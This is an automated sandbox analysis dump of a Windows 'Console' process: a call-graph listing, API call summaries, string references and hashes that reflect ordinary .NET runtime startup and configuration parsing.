Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66695->66725 66696->66662 66699 fc6833 66698->66699 66700 fc68cf 66699->66700 66701 fc6861 66699->66701 66726 1002c90 66700->66726 66702 fc6871 66701->66702 66779 fca580 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66701->66779 66705 1002c90 928 API calls 66702->66705 66706 fc688a 66705->66706 66708 fc57f0 383 API calls 66706->66708 66714 fc68af 66706->66714 66710 fc689b 66708->66710 66709 fc6918 66711 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66709->66711 66710->66709 66710->66714 66780 fca580 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66710->66780 66715 fc6924 66711->66715 66712 fc68e3 66712->66709 66713 fc6902 66712->66713 66781 fca580 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66712->66781 66775 10032c0 66713->66775 66774 fc58c0 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66714->66774 66715->66662 66719->66662 66722->66659 66724->66693 66725->66690 66727 1002ce6 66726->66727 66728 1002cc6 66726->66728 66730 1002f96 66727->66730 66732 1002de1 66727->66732 66733 1002f01 66727->66733 66734 1002ef4 66727->66734 66735 1002dc8 66727->66735 66736 1002eea 66727->66736 66737 1002f0b 66727->66737 66738 1002cfc 66727->66738 66751 1002d01 66727->66751 66754 1002d06 66727->66754 66729 14ab38a _ValidateLocalCookies 5 API calls 66728->66729 66731 1002ce0 66729->66731 66731->66714 66732->66751 66752 1002e02 66732->66752 66753 1002ede 66732->66753 66806 1002fe0 384 API calls 66733->66806 66805 fe35b0 482 API calls 2 library calls 66734->66805 66735->66751 66794 fdddc0 396 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66735->66794 66804 1003370 662 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66736->66804 66807 fe0660 400 
API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66737->66807 66791 10031f0 384 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66738->66791 66742 1002d71 66792 fe09a0 384 API calls 66742->66792 66746 1002f13 66808 fdf540 384 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66746->66808 66748 1002efc 66748->66751 66749 1002db4 66793 1220eb0 RtlFreeHeap Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66749->66793 66751->66730 66759 1002e72 66751->66759 66760 1002f68 66751->66760 66757 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66752->66757 66756 fe4240 928 API calls 66753->66756 66754->66742 66782 fd1fe0 66754->66782 66756->66751 66761 1002e10 66757->66761 66762 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66759->66762 66760->66730 66810 1123a20 388 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66760->66810 66769 1002e21 66761->66769 66798 fe4240 66761->66798 66766 1002e83 66762->66766 66765 1002f1b Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66765->66751 66809 1055860 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66765->66809 66770 1002ea1 66766->66770 66796 1124d30 394 API calls 66766->66796 66795 fd0090 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66769->66795 66797 fd0090 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66770->66797 66772 1002eb3 66772->66714 66774->66712 66776 100331c 66775->66776 67251 fc85b0 66776->67251 66779->66702 66780->66714 66781->66713 66783 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66782->66783 66785 fd2016 66783->66785 66784 fd20e9 66811 fd1a70 66784->66811 66785->66784 66788 fcfef0 
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66785->66788 66788->66784 66789 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66790 fd214b 66789->66790 66790->66742 66791->66751 66792->66749 66793->66751 66794->66751 66795->66751 66796->66770 66797->66772 66802 fe4261 66798->66802 66799 fe434c 67129 1416e50 24 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66799->67129 66801 fe4368 66801->66769 66802->66799 67093 10410a0 66802->67093 66804->66751 66805->66748 66806->66751 66807->66746 66808->66765 66809->66751 66810->66730 66814 fd1abc 66811->66814 66812 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66813 fd1aee 66812->66813 66835 1134450 66813->66835 66814->66812 66816 fd1b5e InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 66845 105f6d0 66816->66845 66819 fd1c98 66821 fd1cff 66819->66821 66823 fd1ca4 66819->66823 66820 fd1be0 66822 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66820->66822 66866 fccef0 66821->66866 66826 fd1bf7 66822->66826 66825 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66823->66825 66828 fd1cbb 66825->66828 66827 fdd800 469 API calls 66826->66827 66830 fd1c8c 66827->66830 66878 fdd800 66828->66878 66832 fd1dbc 66830->66832 66886 fd2ee0 66830->66886 66833 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66832->66833 66834 fd1e26 66832->66834 66833->66834 66834->66789 66837 1134483 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66835->66837 66836 11344da 66927 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66836->66927 66837->66836 66839 11344a5 66837->66839 66840 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66839->66840 66841 
11344b5 66840->66841 66841->66816 66846 105f705 66845->66846 66847 105f75b 66845->66847 66928 1061a40 66846->66928 66848 14ab38a _ValidateLocalCookies 5 API calls 66847->66848 66850 fd1bd6 66848->66850 66850->66819 66850->66820 66851 105f70c 66852 105f80e 66851->66852 66853 105f73b 66851->66853 66946 105ff40 462 API calls 66851->66946 66950 10b14a0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66852->66950 66855 1061a40 462 API calls 66853->66855 66859 105f745 66855->66859 66858 105f72f 66858->66853 66860 105f775 66858->66860 66859->66847 66859->66852 66947 fd6240 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66860->66947 66862 105f7e5 66948 fcd710 13 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66862->66948 66864 105f7fb 66949 1017c60 389 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66864->66949 66867 fccf2c 66866->66867 66868 fccf32 66866->66868 67035 10e27a0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66867->67035 67031 1220c10 66868->67031 66871 fccf4c 66872 fccfcb 66871->66872 66873 fccf50 66871->66873 66874 1219530 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 66872->66874 66875 fccf73 LeaveCriticalSection 66873->66875 66877 fccf81 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66873->66877 66876 fccfd0 66874->66876 66875->66877 66877->66828 66879 fdd86d 66878->66879 66880 fdd849 66878->66880 67036 fde1c0 66879->67036 66881 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66880->66881 66881->66879 66882 fdd8d0 66883 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66882->66883 66884 fdd8dc 66883->66884 66884->66830 66887 fd2f4a 66886->66887 66888 fd304c 66887->66888 66889 fd2f54 66887->66889 67092 1219250 381 API calls 
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66888->67092 66890 ffe830 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66889->66890 66897 fd2f6b 66890->66897 66895 fd2fab LeaveCriticalSection 66899 fd2fbd Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66895->66899 66897->66895 66900 ff6a60 387 API calls 66897->66900 66898 fd3019 66901 14ab38a _ValidateLocalCookies 5 API calls 66898->66901 66899->66898 66906 fd300a HeapFree 66899->66906 66900->66897 66903 fd3046 66901->66903 66903->66832 66906->66898 66931 1061a79 66928->66931 66929 1061bee 66929->66851 66930 1061ac3 66935 1061aee 66930->66935 66981 11517d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66930->66981 66931->66929 66931->66930 66980 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66931->66980 66934 1061b6a 66936 1061b9c 66934->66936 66942 1061bcf 66934->66942 66935->66934 66937 1061b47 66935->66937 66951 1061c20 66935->66951 66938 1061bb9 66936->66938 67029 115dbc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66936->67029 66937->66934 66940 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 66937->66940 66938->66851 66941 1061b54 66940->66941 66941->66934 66982 141ad60 66941->66982 66942->66938 67030 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 66942->67030 66946->66858 66947->66862 66948->66864 66949->66852 66952 121ae20 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 28 API calls 66951->66952 66953 1061c5e 66952->66953 66954 1061d31 66953->66954 66955 1061c95 66953->66955 66956 141a3d0 449 API calls 66954->66956 66957 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock GetProcessHeap RtlAllocateHeap RaiseException 66955->66957 66960 1061cb9 66956->66960 66958 1061c9c 
66957->66958 66958->66960 66961 141abc0 387 API calls 66958->66961 66959 1061d2f 66959->66937 66960->66959 66962 fcd710 13 API calls 66960->66962 66961->66960 66963 1061d85 66962->66963 66964 10b1600 382 API calls 66963->66964 66965 1061d91 66964->66965 66966 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock GetProcessHeap RtlAllocateHeap RaiseException 66965->66966 66967 1061dd3 66966->66967 66968 1061de4 66967->66968 66969 1061def 66967->66969 66970 10618c0 462 API calls 66968->66970 66972 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock GetProcessHeap RtlAllocateHeap RaiseException 66969->66972 66971 1061deb 66970->66971 66971->66969 66973 1061e1b 66972->66973 66974 1061e37 66973->66974 66975 1061e29 66973->66975 66978 1061e53 66974->66978 66979 11517d0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66974->66979 66976 141b240 395 API calls 66975->66976 66977 1061e33 66976->66977 66977->66974 66978->66937 66979->66978 66980->66930 66981->66935 66983 1062190 389 API calls 66982->66983 66984 141ae13 66983->66984 66985 1128840 GetFileSize GetLastError SetLastError SetLastError 66984->66985 66989 141ae59 66984->66989 66987 141ae3c 66985->66987 66986 141b063 66986->66934 66987->66989 66990 141ae4b GetLastError 66987->66990 66988 141ae90 CreateFileMappingW 66991 141aeaa 66988->66991 66992 141aeb7 66988->66992 66989->66986 66989->66988 66990->66989 66993 141b0b6 66990->66993 66991->66992 66994 141aeb0 CloseHandle 66991->66994 66992->66993 66995 141aed4 MapViewOfFileEx 66992->66995 66996 1219520 GetLastError RaiseException 66993->66996 66994->66992 66997 141b0a4 GetLastError 66995->66997 66998 141af18 66995->66998 66999 141b0bb 66996->66999 66997->66993 67002 141b0ae SetLastError 66997->67002 67000 141af29 66998->67000 67001 141af1e UnmapViewOfFile 66998->67001 67003 1219250 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 66999->67003 67000->66986 
67005 141af52 CreateFileMappingW 67000->67005 67001->67000 67002->66993 67004 141b0c5 67003->67004 67006 141b120 67004->67006 67007 141b119 CloseHandle 67004->67007 67005->66993 67010 141af86 67005->67010 67008 141b13b UnmapViewOfFile 67006->67008 67009 141b14a 67006->67009 67007->67006 67008->67009 67011 141b165 67009->67011 67014 14ab398 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RtlFreeHeap 67009->67014 67012 10978a0 MapViewOfFileEx GetLastError SetLastError 67010->67012 67011->66934 67013 141af97 67012->67013 67013->66993 67015 1465d10 11 API calls 67013->67015 67014->67011 67016 141afc1 67015->67016 67016->66999 67017 141b091 67016->67017 67020 141afef 67016->67020 67018 1465dd0 free 67017->67018 67019 141b09a 67018->67019 67021 1219250 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67019->67021 67022 1465dd0 free 67020->67022 67021->66997 67023 141aff8 67022->67023 67024 141b016 67023->67024 67025 141b00a UnmapViewOfFile 67023->67025 67026 141b036 67024->67026 67027 141b02f CloseHandle 67024->67027 67025->67024 67026->66986 67028 141b055 CloseHandle 67026->67028 67027->67026 67028->66986 67029->66938 67030->66929 67032 1220c44 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67031->67032 67033 14ab398 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RtlFreeHeap 67032->67033 67034 1220d72 67032->67034 67033->67032 67034->66871 67035->66868 67037 fde3e2 67036->67037 67040 fde222 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67036->67040 67038 14ab38a _ValidateLocalCookies 5 API calls 67037->67038 67039 fde405 67038->67039 67039->66882 67041 fde40e 67040->67041 67042 fde2e9 67040->67042 67044 1219530 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 67041->67044 67043 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67042->67043 67050 fde2fd 67043->67050 67047 
fde413 6 API calls 67044->67047 67065 fe0a60 67047->67065 67048 14ab398 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RtlFreeHeap 67048->67050 67049 fde578 67052 1061a40 462 API calls 67049->67052 67063 fde5c6 67049->67063 67050->67037 67050->67048 67051 fde68d 67053 fde6a8 67051->67053 67078 1094660 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67051->67078 67052->67063 67057 fde6c3 67053->67057 67079 102ecc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67053->67079 67058 fde714 67057->67058 67080 fe5120 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67057->67080 67060 fde734 67058->67060 67081 121ae20 67058->67081 67062 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67060->67062 67064 fde756 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67060->67064 67062->67064 67063->67051 67073 fed9a0 67063->67073 67064->66882 67066 fe0a77 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67065->67066 67067 fe0d9f 67066->67067 67068 fe0c75 67066->67068 67070 1219530 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 67067->67070 67069 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67068->67069 67071 fe0c82 67069->67071 67072 fe0da4 67070->67072 67071->67049 67072->67049 67074 fccef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67073->67074 67075 fed9d7 67074->67075 67076 fee7b0 381 API calls 67075->67076 67077 fed9fe 67076->67077 67077->67051 67078->67053 67079->67057 67080->67058 67082 121a870 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 23 API calls 67081->67082 67083 121ae6e 67082->67083 67084 121aef7 67083->67084 67085 121ae8e _errno wcstoul _errno 67083->67085 67086 121af15 67084->67086 67088 121af06 HeapFree 67084->67088 
67085->67084 67087 121aeb9 67085->67087 67086->67060 67087->67084 67089 121aebe 67087->67089 67088->67086 67090 121aec9 HeapFree 67089->67090 67091 121aedf 67089->67091 67090->67091 67091->67060 67105 104110e 67093->67105 67094 1041191 67095 10411cc 67094->67095 67110 1042b30 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67094->67110 67096 10413e5 67095->67096 67097 1041247 67095->67097 67098 10411e1 67095->67098 67099 104121c 67095->67099 67100 104147a 67095->67100 67113 10415b8 67095->67113 67121 1041418 67095->67121 67156 104b9e0 67096->67156 67155 109f510 409 API calls 67097->67155 67130 109eca0 67098->67130 67135 109ed50 67099->67135 67103 109ed50 928 API calls 67100->67103 67108 1041416 67103->67108 67105->67094 67138 fe40e0 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67105->67138 67119 1041498 67108->67119 67169 104d340 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67108->67169 67111 1041217 67110->67111 67112 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67110->67112 67116 14ab38a _ValidateLocalCookies 5 API calls 67111->67116 67112->67111 67114 109eca0 381 API calls 67113->67114 67117 10415f4 67114->67117 67122 1042b78 67116->67122 67171 109ad00 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67117->67171 67118 104140d 67167 10432e0 381 API calls 67118->67167 67170 104f140 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67119->67170 67168 10432e0 381 API calls 67121->67168 67122->66802 67129->66801 67132 109ed19 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67130->67132 67131 10411f4 67131->67111 67139 105a040 67131->67139 67132->67131 67172 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67132->67172 67173 109edb0 67135->67173 67138->67094 67140 105a055 
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67139->67140 67228 fe5090 67140->67228 67142 105a144 67142->67111 67143 105a10a 67143->67142 67144 105a040 928 API calls 67143->67144 67144->67143 67145 105a05e 67145->67143 67147 105a14b 67145->67147 67149 105a150 67145->67149 67242 fc5bc0 928 API calls 2 library calls 67145->67242 67243 10034d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67147->67243 67244 1002a30 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67149->67244 67151 105a159 67245 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67151->67245 67154 104d340 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67154->67111 67155->67111 67158 104b9f6 67156->67158 67157 104ba4a Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67157->67118 67158->67157 67250 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67158->67250 67167->67108 67168->67108 67169->67119 67170->67111 67171->67111 67179 109edd6 67173->67179 67174 109f4e1 67225 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67174->67225 67176 109f4eb 67226 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67176->67226 67177 109eee5 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67183 109f03a 67177->67183 67186 109f4c4 67177->67186 67188 109ef67 67177->67188 67178 109f4cb 67223 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67178->67223 67179->67174 67179->67177 67179->67178 67214 fe40e0 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67179->67214 67182 109f4f2 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67227 104aec0 394 API calls 
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67182->67227 67183->67174 67190 109f0c4 67183->67190 67203 109f143 67183->67203 67184 109f4d7 67224 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67184->67224 67222 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67186->67222 67187 109f025 67217 fed8c0 SleepEx SwitchToThread Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67187->67217 67188->67178 67188->67187 67195 109f001 67188->67195 67196 109f015 67188->67196 67193 109f010 67190->67193 67201 109f100 67190->67201 67204 109f189 67193->67204 67207 109f139 67193->67207 67195->67187 67198 109f006 67195->67198 67216 fed8c0 SleepEx SwitchToThread Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67196->67216 67215 fed8c0 SleepEx SwitchToThread Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67198->67215 67218 104b870 394 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67201->67218 67205 104b9e0 394 API calls 67203->67205 67213 109f479 67203->67213 67208 14ab38a _ValidateLocalCookies 5 API calls 67204->67208 67205->67193 67212 109f1dc Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67207->67212 67219 10511c0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67207->67219 67210 1041226 67208->67210 67210->67111 67210->67154 67212->67174 67212->67176 67212->67184 67212->67186 67212->67213 67220 105af20 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67212->67220 67213->67182 67221 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67213->67221 67214->67177 67215->67193 67216->67193 67217->67193 67219->67212 67220->67213 67229 fe509f 67228->67229 67230 fe50b2 67228->67230 67246 fc5bc0 928 API calls 2 library calls 67229->67246 67232 fe50b0 67230->67232 
67249 10034d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67230->67249 67232->67145 67233 fe50aa 67233->67232 67247 1002a30 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67233->67247 67237 fe50ca 67248 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67237->67248 67242->67145 67244->67151 67246->67233 67247->67237 67252 fc86f5 67251->67252 67253 fc85ee 67251->67253 67252->66709 67254 fc865d 67253->67254 67271 fd8aa0 67253->67271 67263 fcecd0 67254->67263 67257 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67258 fc86d8 67257->67258 67260 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67258->67260 67259 fc8664 67262 fc868b 67259->67262 67275 1003010 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67259->67275 67260->67252 67262->67257 67264 fced9d 67263->67264 67265 fcece7 67263->67265 67289 101a1b0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67264->67289 67268 fced1e 67265->67268 67276 108d1d0 67265->67276 67270 fced35 67268->67270 67288 108d100 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67268->67288 67270->67259 67272 fd8abd 67271->67272 67321 104ce40 383 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67272->67321 67274 fd8ad9 67274->67254 67275->67262 67277 108d20b 67276->67277 67278 108d2b0 67276->67278 67298 1215d00 67277->67298 67279 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67278->67279 67282 108d2bf Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67279->67282 67281 108d23d Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67305 107cb60 GetTickCount SetEvent SleepEx SwitchToThread 
Control-flow Graph
APIs
• VirtualProtect.KERNEL32(0150E8D8,00000004,00000004,00000000,?,?,014187BE,?,00FC0000,?,?,00000000), ref: 01418411
• GetTickCount.KERNEL32 ref: 0141841B
• VirtualProtect.KERNEL32(0150E8D8,00000004,00000000,00000000,?,?,014187BE,?,00FC0000,?,?,00000000), ref: 01418443
• GetSystemInfo.KERNEL32(0163F09C,7CAB6A82,00000000,?,00000000), ref: 0141850C
• SetConsoleCtrlHandler.KERNEL32(01418330,00000001,?,00000000), ref: 0141852D
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 01418538
• GetProcAddress.KERNEL32(00000000,InitializeContext2), ref: 01418544
• GetModuleHandleW.KERNEL32(ntdll.dll,?,00000000), ref: 01418554
• GetProcAddress.KERNEL32(00000000,RtlRestoreContext), ref: 01418566
• InitializeCriticalSection.KERNEL32(0163EE00,?,00000000), ref: 014185B4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual$ConsoleCountCriticalCtrlHandlerInfoInitializeSectionSystemTick
• String ID: %s completed$%s failed with code %x$===================EEStartup Completed===================$===================EEStartup Starting===================$EX_RETHROW line %d$EnsureRtlFunctions()$GC heap initialization failed with error 0x%08X$InitializeContext2$Returned successfully from InitThreadManager$RtlRestoreContext$g_pConfig->sync()$kernel32.dll$ntdll.dll
• API String ID: 1537217695-3323499670
• Opcode ID: 40dee12f3c277b8ee3b0c1c7f99bd791f5c2c257158e1b9296667a7556a289fb
• Instruction ID: c08625c04d66bf06f37b186e6d9be290bc103d3bedee8c6dacf13c46035db4ae
• Opcode Fuzzy Hash: 40dee12f3c277b8ee3b0c1c7f99bd791f5c2c257158e1b9296667a7556a289fb
• Instruction Fuzzy Hash: 8D42B174A003069FE720EFA9EC46BAE7BA1FB54704F10441EE905A7398EB759910CB72
APIs
  • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
  • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
  • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
  • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
• HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 010D319C
• wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,00000000,?,00000000), ref: 010D322E
• HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 010D333A
• _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,debug,?,00000000), ref: 010D3384
• HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 010D33B5
• HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 010D34B2
• _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000), ref: 010D373C
• wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,0000000A), ref: 010D3752
• _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 010D375E
  • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000,7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AF0F
  • Part of subcall function 0121B260: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,00000000,0164A018,00000000,010D3877,?,00000000), ref: 0121B28E
• HeapFree.KERNEL32(00000000,?), ref: 010D3B66
Strings
• ZapBBInstr, xrefs: 010D34EB
• System.Runtime.TieredPGO, xrefs: 010D394C
• System.Runtime.TieredCompilation.QuickJit, xrefs: 010D3817
• true, xrefs: 010D3027
• System.Runtime.InteropServices.BuiltInComInterop.IsSupported, xrefs: 010D3717
• System.GC.Concurrent, xrefs: 010D3013
• ReadyToRunExcludeList, xrefs: 010D342C
